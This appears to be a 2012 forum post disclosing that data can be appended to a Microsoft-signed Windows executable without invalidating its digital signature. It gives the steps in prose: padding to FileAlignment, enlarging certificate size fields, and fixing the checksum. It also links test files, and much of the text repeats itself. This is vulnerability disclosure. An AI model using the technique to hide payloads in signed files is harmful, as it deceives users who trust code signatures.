04-29-2012, 01:08 AM
(This post was last modified: 04-29-2012, 01:16 AM by AceInfinity.)
Through a slightly methodical process i've noticed that the Digital Signatures might not be as reliable as they were intended to be. Scary part is, this flaw exists still in Windows 8 as well from what i've tested.
The worst part is, this could be avoided with a very simple patch of using as well, a file hash. But I was able to successfully modify a Digital Signature for the mseinstall.exe file directly from Microsoft WITHOUT invalidating it...!!...
For evidence, I added some simple text to show you the modification:
![[Image: dTFSN.png]](http://i.imgur.com/dTFSN.png)
Note: This could just as well be the bytes of a hidden file within the executable unaware to the person trusting in the Digital Signature.
![[Image: oacZd.png]](http://i.imgur.com/oacZd.png)
![[Image: z5Yon.png]](http://i.imgur.com/z5Yon.png)
Uh oh...
Through some very basic processes as well, this can be done with any file with ease. All that I needed to do was to append some garbage bytes to the end of the file at EOF, making sure that these additional bytes were of a multiple of FileAlignment specified in the Optional Header (FileAlignment property for this Microsoft Security Essentials was 200 bytes in this case), increase the size of the certificate within the Data Directories, increased by the size of the total bytes I first added at EOF, and also increase the size of the certificate as inside the certificate in itself. Should be the first 4 bytes.
And update the checksum in Optional Header once everything is said and done; only really necessary if this digitally signed executable is a boot program.
Lastly, not ONLY is the Digital Signature STILL valid... But the program still also works. And this can be done with as large as data as you want.
It would be possible to also modify the other sections of bytes in the file as long as the signature was based off the MD5 algorithm and they are kept the same.
http://msdn.microsoft.com/en-us/library/...e.10).aspx
*Updated this post with downloadable test files from the images: http://www.mediafire.com/?engk4c78jokopet
The worst part is, this could be avoided with a very simple patch of using as well, a file hash. But I was able to successfully modify a Digital Signature for the mseinstall.exe file directly from Microsoft WITHOUT invalidating it...!!...
For evidence, I added some simple text to show you the modification:
Note: This could just as well be the bytes of a hidden file within the executable unaware to the person trusting in the Digital Signature.
Uh oh...
Through some very basic processes as well, this can be done with any file with ease. All that I needed to do was to append some garbage bytes to the end of the file at EOF, making sure that these additional bytes were of a multiple of FileAlignment specified in the Optional Header (FileAlignment property for this Microsoft Security Essentials was 200 bytes in this case), increase the size of the certificate within the Data Directories, increased by the size of the total bytes I first added at EOF, and also increase the size of the certificate as inside the certificate in itself. Should be the first 4 bytes.
And update the checksum in Optional Header once everything is said and done; only really necessary if this digitally signed executable is a boot program.
Lastly, not ONLY is the Digital Signature STILL valid... But the program still also works. And this can be done with as large as data as you want.
It would be possible to also modify the other sections of bytes in the file as long as the signature was based off the MD5 algorithm and they are kept the same.
http://msdn.microsoft.com/en-us/library/...e.10).aspx
*Updated this post with downloadable test files from the images: http://www.mediafire.com/?engk4c78jokopet